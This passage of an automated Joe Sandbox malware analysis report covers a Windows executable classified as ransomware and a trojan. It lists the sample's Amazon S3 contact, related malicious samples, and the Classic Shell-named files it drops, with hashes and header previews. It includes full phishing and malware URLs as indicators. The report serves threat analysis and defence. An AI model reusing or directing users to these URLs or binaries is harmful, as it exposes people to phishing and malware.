                                                  http://defaultcontainer/package/services/metadata/core-properties/0efccca87b4345efa345d5a58c8332f0.pUpdate.exe, 00000003.00000002.2060372901.000000000290E000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000027F9000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		low

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  3.5.232.137
                                                  		s3-r-w.sa-east-1.amazonaws.comUnited States
                                                  		16509AMAZON-02USfalse

                                                  General Information

                                                  Joe Sandbox version:40.0.0 Tourmaline
                                                  Analysis ID:1404607
                                                  Start date and time:2024-03-07 10:46:30 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 9m 24s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Run name:Run with higher sleep bypass
                                                  Number of analysed new started processes analysed:21
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:1
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:00023948209303294#U00ac320302282349843984903.exe
                                                  renamed because original name is a hash value
                                                  Original Sample Name:00023948209303294320302282349843984903.exe
                                                  Detection:MAL
                                                  Classification:mal80.rans.troj.evad.winEXE@24/60@1/1
                                                  EGA Information:
                                                  • Successful, ratio: 75%
                                                  HCA Information:Failed
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                  • Execution Graph export aborted for target Update.exe, PID 3648 because it is empty
                                                  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  No simulations

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  No context

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  s3-r-w.sa-east-1.amazonaws.com0219830219301290321012notas.exeGet hashmaliciousUnknownBrowse
                                                  • 3.5.232.21
                                                  0219830219301290321012notas.exeGet hashmaliciousUnknownBrowse
                                                  • 3.5.234.1
                                                  0923840932020004-3-0.exeGet hashmaliciousUnknownBrowse
                                                  • 3.5.232.185
                                                  WKYC506_2389030007-00901003007010_777380775_#U00b2.exeGet hashmaliciousUnknownBrowse
                                                  • 52.95.163.114
                                                  WKYC506_2389030007-00901003007010_777380775_#U00b2.exeGet hashmaliciousUnknownBrowse
                                                  • 16.12.0.34
                                                  DOC7186723912#U0370.msiGet hashmaliciousHidden Macro 4.0Browse
                                                  • 52.95.164.60
                                                  DOC0974045396#U0370.msiGet hashmaliciousHidden Macro 4.0Browse
                                                  • 52.95.164.98
                                                  file.msiGet hashmaliciousHidden Macro 4.0Browse
                                                  • 52.95.164.11
                                                  F#U00b498074756.msiGet hashmaliciousHidden Macro 4.0Browse
                                                  • 52.95.164.122

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  AMAZON-02UShttp://clickme.thryv.com/ls/click?upn=u001.dWMqEYBIuxWGqsZsQRCRgSocWpGOcVGgEC5LGCXpv50-3DF978_VGTOh0XByfTefzXwOhsX-2Bm5xAWZwpGkO7vRpqRBAUGTjZWNIFAHx6Tm3FX2pKd-2BUk2XH3vOH3tg5MZAvGQE-2BL4hNE7qP6T5tr8BYPiaesYUDxKFLbC6Lb88c60pAU44WC2I29BRhSsPKpOk6dkcajHynnV3Zx-2Fg4eSgSwJgABu-2FkkZmeK7TlLKEnVjX4W89skvmRAxvQf4wpnMe9x2KfW6MqY7mZ0RUsQ3jK4qmGNHMx6q4WZQxziV8lDXzVSMgvKbeIF24YZbCCOgqgIpKDsdl1GSK-2BQ0fOCFAT7EYMOxE2Qc9fFZYPMysdFSE2DcNNX7FNSEfQMKuczyjiHzC7QDgYRNTmOM9x3hyNJMBLx-2Fw-3D#YnJhZC5jb21tQG1hZ2FpcnBvcnRzLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                  • 13.226.210.113
                                                  UNB-PIO88938MBANSOP.docx.docGet hashmaliciousRemcosBrowse
                                                  • 54.247.69.169
                                                  http://euw1.nyl.asGet hashmaliciousUnknownBrowse
                                                  • 99.80.178.120
                                                  https://tracker.club-os.com/campaign/click?qDomYmsgId=d738c6bd137e6a03157c6c728cbc659e734fc398&test=false&target=https://aboard-first-humor.glitch.me#kshi@centrecare.com.auGet hashmaliciousUnknownBrowse
                                                  • 13.237.71.205
                                                  jo1rUWa2B8.elfGet hashmaliciousUnknownBrowse
                                                  • 34.249.145.219
                                                  I9weWMTBWw.elfGet hashmaliciousUnknownBrowse
                                                  • 34.243.160.129
                                                  SUMS7h66l9.elfGet hashmaliciousUnknownBrowse
                                                  • 54.217.10.153
                                                  Zimbra Web Client Sign Inbd.htmGet hashmaliciousUnknownBrowse
                                                  • 18.154.206.83
                                                  http://cloudflare-ipfs.com/ipfs/bafkreihx3xc2ne6wiuuywkb345yoieojhi77e3gdb2sjm2b6symviw2yh4?filename=Inbox.html#inspections.darwin@elders.com.auGet hashmaliciousHTMLPhisherBrowse
                                                  • 13.33.21.54
                                                  bTYd.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                  • 54.94.248.37

                                                  JA3 Fingerprints

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  37f463bf4616ecd445d4a1937da06e19Purchase List.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 3.5.232.137
                                                  Update.jsGet hashmaliciousSocGholishBrowse
                                                  • 3.5.232.137
                                                  6009287162.vbsGet hashmaliciousXWormBrowse
                                                  • 3.5.232.137
                                                  6009287162.vbsGet hashmaliciousXWormBrowse
                                                  • 3.5.232.137
                                                  SW_PC_Interact2.3.5_Build6.exeGet hashmaliciousDBatLoaderBrowse
                                                  • 3.5.232.137
                                                  6009287162.vbsGet hashmaliciousXWormBrowse
                                                  • 3.5.232.137
                                                  Condensers.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 3.5.232.137
                                                  PDFCreator-1_5_0_setup.exeGet hashmaliciousUnknownBrowse
                                                  • 3.5.232.137
                                                  factura-022853.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 3.5.232.137

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Program Files\Classic Shell\ClassicExplorer32.dll

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):760632
                                                  Entropy (8bit):6.295643740329593
                                                  Encrypted:false
                                                  SSDEEP:12288:wMpm8zQAic9BZFiiNtmWFD7U0RJrs6aEYaTC7wdX5BYblG9N:rl/wiTP1JRJKEYaTC7wdX52hI
                                                  MD5:F239F9186BBF10EF438B0B0C5A71D9A9
                                                  SHA1:6B1B562C59121049BF5C15187DE51A507710E5D7
                                                  SHA-256:5CD5193B50CEBEFB65DDFA227E2806425B35327D6B545145C6E65A946ED43928
                                                  SHA-512:7F63EC4ACE5679C6C2775CFDC7C21F77D0481BF779C78B51D2806551B61AD5E39D18E1786BD9A0DB968AFB2A1279C7543D7067B84B4907A2817D4FFE737F5F94
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c....a...a...a..z....a..z....a...`.l.a..z...a..z..I.a..z....a..P....a..z....a.Rich..a.................PE..L...\.K[...........!.................@...............................................7....@..........................8..6.......|......................8....p...Z......................................@...............0............................text...Q........................... ..`.rdata...I.......J..................@..@.data........@...`...(..............@....rsrc..............................@..@.reloc..`v...p...x..................@..B................................................................................................................................................................................................................................................................................................................................

                                                  C:\Program Files\Classic Shell\ClassicExplorer64.dll

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):885560
                                                  Entropy (8bit):6.030254768387881
                                                  Encrypted:false
                                                  SSDEEP:12288:fF6mgUVLctszL5BffCerxb+sNs/qOGiHR5BYblGx:f9hVLctQL5Bnfrxb+sNQ5HR52he
                                                  MD5:A7BDF136014CC2BE258CCAC078F437EB
                                                  SHA1:EF1108633774F52E406F2A787A2102035DB21858
                                                  SHA-256:363809B264B915BD640580F05195A61F308B351555667072239835EC51F4405C
                                                  SHA-512:C90637F3D5D6892ABDEF506566B130D6816CE0BA8C9F6506742144B63678B22E80CE7839DCF7B9BCBAE53BD4E8C355781B06A9B64CBBD1B901176B1779FB5B8D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......70>=sQPnsQPnsQPnz).nxQPnz).nrQPnz).nqQPnz).nVQPnsQQn.PPnz).n&QPnz).n.QPnz).nrQPnm..nrQPnz).nrQPnRichsQPn........................PE..d...F.K[.........." ................d...............................................Hr....@.........................................p... .......|....@.........Hi...v..8.......$...0................................................................................text...B........................... ..`.rdata..............................@..@.data...P...........................@....pdata..Hi.......j...j..............@..@.rsrc.......@......................@..@.reloc..L............b..............@..B................................................................................................................................................................................................................................................

                                                  C:\Program Files\Classic Shell\ClassicExplorerSettings.exe

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):98616
                                                  Entropy (8bit):6.05086836225285
                                                  Encrypted:false
                                                  SSDEEP:1536:HpotLuQVD29umGs9wT4I9H+e3Wvv7dgKwd9ndX3rDw6:4L8v2H+jvv7mX7Dw6
                                                  MD5:3DB84D449984C7E980C25DA3F265186D
                                                  SHA1:FF99DF916A31393E569ED9CC7C10215811DCFCFC
                                                  SHA-256:58B62BA62C53CCED2B8AC6AFAF730E04616F574D63A69E50732F13FA2FDC0F85
                                                  SHA-512:3ADEDD69871D772479720557939EDB86AF3A805924567D310BCF73D1F8C36530EB213F63A59A309A4EDAB57C96368819F30E02D304FDF2EFB95F0FCEB1392028
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5P7.T>d.T>d.T>d.,.d.T>d.,.d.T>d.,.d.T>d.T?d.T>d.,.d.T>d...d.T>d.,.d.T>dRich.T>d................PE..L...].K[..........................................@..................................P....@.............................................(............t..8.......L.......................................@...............h............................text............................... ..`.rdata..L".......$..................@..@.data....+..........................@....rsrc...(...........................@..@.reloc...............d..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                  C:\Program Files\Classic Shell\ClassicIEDLL_32.dll

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):507192
                                                  Entropy (8bit):6.331523727596564
                                                  Encrypted:false
                                                  SSDEEP:6144:jRV3H1qXVdC9lIltuTHkHuwXJpJIOhqr5LEE81954gJbbB1I:jRV3HMVdCTIlUTHkH/XJpS8qr9G5BJbM
                                                  MD5:D82C55EF5C9F4DEA2151907D45040B4A
                                                  SHA1:605AAAD9C12AB3FD3A44C9B9ADBFD9C75196D565
                                                  SHA-256:336F2689D81BC7C2B623C1E1FB67B6D32D4B615DCCE94DC9E37ED9E1BF59EAC7
                                                  SHA-512:F8D7BF2397E73DD718B4553F45C2B28CBB44834992DA87832EE71D686C845938B068A2BE34AF4366CCB5894618D89FC5D911D04CD1E0461F7096243D6C94CFE1
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........LK.."..."..."......."......."...#...".......".......".......".......".......".Rich..".........................PE..L...[.K[...........!................+........ ............................... ......c.....@.........................0.......X...h....`...Q..............8........6...&..............................@...@............ ..h............................text...E........................... ..`.rdata....... ......................@..@.data....U.......6..................@....tls.........P......................@....rsrc....Q...`...R..................@..@.reloc..8T.......V...Z..............@..B................................................................................................................................................................................................................................................................................

                                                  C:\Program Files\Classic Shell\ClassicIEDLL_64.dll

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):292352
                                                  Entropy (8bit):6.291424923805442
                                                  Encrypted:false
                                                  SSDEEP:6144:P+EhZJuiWErKqa2ayOpH6X0v9oh/BBGGUOO:GEdyErYWOpz9o7De
                                                  MD5:9534F7D1F6BA24DB066355BBC9B54838
                                                  SHA1:10374B028B7052A18D1AE64C5B9962F37D0E79F5
                                                  SHA-256:6A7E6DE75E34DC410F50823E92DF4F6C6E45025433D1328B7133BF4CB1010D28
                                                  SHA-512:13B5703C02B3C3FFE54AEC7FFC59CB20E7819261F6B3B3F0F5A62A92F0D19127D2892C2E91544FB52BD187882D8DCCC1FCE796A3D28D4BFB3ABAD33E88024D55
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Virustotal, Detection: 17%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._9.n1j.n1j.n1j..2k.n1j..5k.n1j..4k.n1j..5k.n1j..2k.n1j..4k.n1j..0k.n1j.n0j.n1j..8k.n1j..1k.n1j...j.n1j..3k.n1jRich.n1j........PE..d...2..e.........." ... ............<.....................................................`..........................................1.......2...............p..$'..............h...`...p........................... ...@............................................text...<........................... ..`.rdata...?.......@..................@..@.data....*...@.......,..............@....pdata..$'...p...(...@..............@..@_RDATA..\............h..............@..@.rsrc................j..............@..@.reloc..h............l..............@..B........................................................................................................................................................................................................

                                                  C:\Program Files\Classic Shell\ClassicIE_32.exe

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):104248
                                                  Entropy (8bit):6.034633491813912
                                                  Encrypted:false
                                                  SSDEEP:1536:R/3PSNKe2wmLlIUa22Ud1FRyLoXCsY++3Wvv7dgKwd9nxCNf:R/qTmLKuNLY+Dvv7uCNf
                                                  MD5:A1C24588503CD2C1690EF94BBF341829
                                                  SHA1:5368795D2A0C0BC404EF2D108A4812979F4544F5
                                                  SHA-256:F37F3BD363D1695E0A151C3302FCFB8BE770EB107B066D05F10C4FB6C946318F
                                                  SHA-512:7C2E079DD59CD3C905DB6EF1C41356D38E000C9D1FC7E4867BE4B2039BA866871F310C096B29B93D07B71B52B78AC9274FFB77A8257F4A8D7DDF8DD4AF8B4B7F
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w.H.3|&A3|&A3|&A:..A#|&A:..AZ|&A:..A"|&A3|'AO|&A:..A.|&A-..A2|&A:..A2|&ARich3|&A........................PE..L...^.K[..........................................@.......................................@.................................<........... ...............8...............................................@............................................text............................... ..`.rdata...........0..................@..@.data... ,..........................@....rsrc... ...........................@..@.reloc...............t..............@..B................................................................................................................................................................................................................................................................................................................................

                                                  C:\Program Files\Classic Shell\ClassicIE_64.dll

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32435238
                                                  Entropy (8bit):1.2710100369600539
                                                  Encrypted:false
                                                  SSDEEP:49152:407uhAXR+1pD7HB9Ke2It1A8nrpaSwm19ATXykaoQCRb/JTW8kip:z7y1pTKevI9BT9b
                                                  MD5:42D43DC42198364FE4543E9265FDD8D5
                                                  SHA1:333A60BCA6CE1D7BD4C631D04297BD4EC77618A9
                                                  SHA-256:B2B24F67B78FBBA6B605767AC4DDE4CE794D6B279A179A5485A21B7AA6249A11
                                                  SHA-512:00508389F85354F6AB501FA29A7FBD492C1A0C161FCD3C1F7EE4DD0E7C29A045A8B1973353A2E3FA7DE7F6AC6ED9C97C03BA89A8A8D7BC1924C2C8E56B31B1E8
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Virustotal, Detection: 18%, Browse
                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d......e.........." ......<..........)<.......@..............................@K...................................... ................C......PC..U...PJ.......F..Y............C.....................................................0fC.(.....C......................text...,.<.......<................. ..`.data....h....=..j....=.............@....bss....H.....B..........................idata...U...PC..V...jB.............@....didata.......C.......B.............@....edata........C.......B.............@..@.rdata..D.....C.......B.............@..@.reloc........C.......B.............@..B.pdata...Y....F..Z....E.............@..@.rsrc........PJ......4I.............@..@.............@K.......J.............@..@........................................

                                                  C:\Program Files\Classic Shell\ClassicIE_64.exe

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):103736
                                                  Entropy (8bit):5.912660682474699
                                                  Encrypted:false
                                                  SSDEEP:1536:OSz4xjHKQ9M2Q2ejqU0Fe/jPbnKaKlyXdWRpew3Wvv7dgKwd9nxCC:OSz4xjHK12QmPM/jPRXd0pOvv7uCC
                                                  MD5:CCCA2C0E6653506652437868D1049817
                                                  SHA1:C3B56B86ACE2FA1ADDDE2EC81D0087D31E12CF80
                                                  SHA-256:625BB2074498952E01A21C2D54B9B9A4C0841F743E038799B907126980A984BE
                                                  SHA-512:CC8E9B84AEAB7044829605BF7329EECCC9C8B595393B037FC5259CABE0D7BBCA07C559C8D2FB67282E482C3F369AB0B9F5236FE9D2E83F8D4110B822E6781F10
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!.~.!.~.!.~.(...D.~.(...(.~.(.....~.!...W.~.(.....~.?... .~.(... .~.Rich!.~.........................PE..d...H.K[..........".................p..........@....................................TH....@..........................................................@.. ....0..........8...............................................................0............................text.............................. ..`.rdata..X6.......8..................@..@.data...`6..........................@....pdata.......0......................@..@.rsrc... ....@......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                                                  C:\Program Files\Classic Shell\ClassicShell.chm

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:MS Windows HtmlHelp Data
                                                  Category:dropped
                                                  Size (bytes):1585627
                                                  Entropy (8bit):7.995160864775383
                                                  Encrypted:true
                                                  SSDEEP:49152:1mpETL+Y3zUHQu0u7LPe1Ak9cbPzs/kd8ZsGOh3smmIIEB:1mpEmYAHL0uvPeMLs/edsFY
                                                  MD5:251138D2F6A0CA903370941D90E6479B
                                                  SHA1:840BAAC95310FEBBC209FEE2F6E375F752117F3E
                                                  SHA-256:0CC0453C66731CE5A04FB86C65C1434BA8B0CE58F5D677B2C41E546E35C06BD0
                                                  SHA-512:861453B90C30D87949E9C7E23EAC24A2B1CB1732B27AE4DC3FD404A0AB2F9E7706FD3CE4FD045650C70A1D4216610DFAECCC6BC6A4D9EF10CCBF48866F7B3755
                                                  Malicious:false
                                                  Preview:ITSF....`.................|.{.......".....|.{......."..`...............x.......T........................1..............ITSP....T...........................................j..].!......."..T...............PMGL5................/..../#IDXHDR..}.../#ITBITS..../#STRINGS....P./#SYSTEM..F.../#TOPICS..}.@./#URLSTR....../#URLTBL..=.P./$FIftiMain..../$OBJINST...>.?./$WWAssociativeLinks/..../$WWAssociativeLinks/Property...:../$WWKeywordLinks/..../$WWKeywordLinks/Property...6../ClassicExplorer.html.....:./ClassicIE.html.....J./ClassicShellTOC.hhc...../ClassicStartMenu.html...G..A./images/..../images/after.png...Q..../images/before.png...d..m./images/button_images.png..n.../images/button_settings.png......../images/ClassicShell.png...S.../images/explorer_settings.png...^..L./images/ie9_caption.png.....R./images/ie9_settings.png...I..n./images/ie9_status.png..U.t./images/search1.png......u./images/search2.png..v.. ./images/search3.png.....X./images/settings1.png...E..K./images/settings2.png

                                                  C:\Program Files\Classic Shell\ClassicShellReadme.rtf

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):96473
                                                  Entropy (8bit):5.013468996514304
                                                  Encrypted:false
                                                  SSDEEP:768:lWr3D3DOCwcwxA1zK48IVT2CsjfjKGwI+X0IjpqsqqqCKAoCk4O6CMqBjLW5qo/e:lWHsy9NOqj/DM
                                                  MD5:D00CE44FF320F14EE7B733B3C78AE615
                                                  SHA1:625DAA8A5958360EF2A667839C4324B6101CAF7D
                                                  SHA-256:95F7362D6F5BD9F2174CA189369CE4D6E25069CDB48670B223399C0523D9D145
                                                  SHA-512:1C97F17E61209523B47B7A5E1C72557C8795FB13FB72D5747510AE0134BA986308C1FB6B9DAC9A1D14949C60C6358CEA3B6969886726CDC59D21F0C7F923F0A3
                                                  Malicious:false
                                                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}..{\f36\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 0204050305040603

                                                  C:\Program Files\Classic Shell\ClassicShellUpdate.exe

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):402744
                                                  Entropy (8bit):6.23649982678044
                                                  Encrypted:false
                                                  SSDEEP:6144:bdM5fvstilELNbP86TAlLRH8F1954gYbAmNcFK7:bqlgilEpbP86Tq45BYbAK7
                                                  MD5:4F0018CC8BA1F9FBA64A873FD526775E
                                                  SHA1:B0C6788606318F064D9877E0C9D0459A5C34EB3A
                                                  SHA-256:C3209FD73A748A066443CAF1A87D002451D67A33BA33B51BADFC181F25BD5603
                                                  SHA-512:732B68C5A64E00B2706EE4B683D74BCA6877F6204D9B6E6B28D87574D3525C997FFDF5D05A9889951291EE42C4C45E00B726B5A1885D4C41380B41D4613A3122
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  • Antivirus: Virustotal, Detection: 1%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y...8...8...8...@#..8...@5..8...@%..8...8...9...@2..8...j"..8...@'..8..Rich.8..................PE..L...R.K[.....................2....................@..........................p............@.................................\s..@.......x7..............8.... .. #.. ...............................PJ..@............................................text...{........................... ..`.rdata..............................@..@.data...|I.......(...t..............@....rsrc...x7.......8..................@..@.reloc...B... ...D..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                  C:\Program Files\Classic Shell\ClassicStartMenu.exe

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):163640
                                                  Entropy (8bit):5.997314411159734
                                                  Encrypted:false
                                                  SSDEEP:3072:MLKDkNh+eE+AEvQmtMt5dZaFyCO6c7zlXLCHXTpEhfcvv7fFb:kK+vO7ZaFyCOl7IiNcbdb
                                                  MD5:6776A3D1C644BFE33932189B00165CAF
                                                  SHA1:C109B9B2F344748DAFF26FCC0B55FA0D2CF8322F
                                                  SHA-256:A99ADF420EF6498E2E665703FCD1DC76BDBAA5A2E1F38D72F7229A9C3CD932E7
                                                  SHA-512:4DB70C69BE312D8065B2013D0A83B235969C7F38B31A8C54C63F8F6C0A888F139DF45EEEB6C245BB7D4DD07F24A18BE9507C4A80DEE2CF4D274F7BC8CBBF8AA9
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............b...b...b.......b......Sb.......b.......b...b...b.......b...0...b.......b..Rich.b..........PE..d...L.K[.........."......6...8......pd.........@.....................................d....@..........................................................0...............r..8............U...............................................P.. ............................text....4.......6.................. ..`.rdata...b...P...d...:..............@..@.data....I.......(..................@....pdata..............................@..@.rsrc........0......................@..@.reloc..^............l..............@..B................................................................................................................................................................................................................................................................................

                                                  C:\Program Files\Classic Shell\ClassicStartMenuDLL.dll

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):3664696
                                                  Entropy (8bit):6.362994861073782
                                                  Encrypted:false
                                                  SSDEEP:49152:1KLlaN5QY6eVmrOh2yxvV+4cjtnQ7luPEZuzWu204gw+5xDIoFLnnu:fZkmzALRA+0IDnu
                                                  MD5:1434E96C86A3B5A9BA9C9A95F1BE1584
                                                  SHA1:04C81A71E96940DDDC13A097BEF440343C8D197B
                                                  SHA-256:3AD92E7759614D08395EBDEEC411035C7D68CB2FA7532B70FC564546F9DEC4B1
                                                  SHA-512:9E9C37047671C5B67180612771D037D332139BA46C6CAC16196E9A863C120D4B45E72A287E6DF41759E04A990F9A77A04C1C841BB89FC6B88C69189A197601D4
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%.<.ahR.ahR.ahR.h...mhR.h....hR.h...bhR.h...chR.h...NhR.ahS.|jR.h....hR.h...`hR..:..`hR.h...`hR.RichahR.........PE..d...I.K[.........." .........($.....<........................................P9.......8...@..........................................u......P=.......0..........0.....7.8.... 9.........................................................0............................text...&........................... ..`.rdata..H...........................@..@.data...X........R...`..............@....pdata..0...........................@..@text....-...........................@.. data....0.... ......................@..@.rsrc........0......................@..@.reloc....... 9..0....7.............@..B................................................................................................................................................................................

                                                  C:\Program Files\Classic Shell\ExplorerL10N.ini

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):103818
                                                  Entropy (8bit):5.8928331157621825
                                                  Encrypted:false
                                                  SSDEEP:1536:/dlWdvXfn9mkt7wNVOL8gNn6pj5Iq8VIsj203XBnBG:/7NhNOf3j203O
                                                  MD5:C89E164A7D30247919FAE38C7512AD24
                                                  SHA1:F42BC1CDC66E4822DAE63F0AE2F640E4B217615A
                                                  SHA-256:7974A14E02B91A3BCB1E15FCE3AAD7D640D2800989CDD1BA3C5A82F847DE5B98
                                                  SHA-512:EAA448EC09EE02BFF711A2101303F80FC608F6D5B9760C3F3C963CC4D36C4F88EB4BDE16573955321F0166A171F4F98D3AE5A8AA805C5D972DE855491DC98031
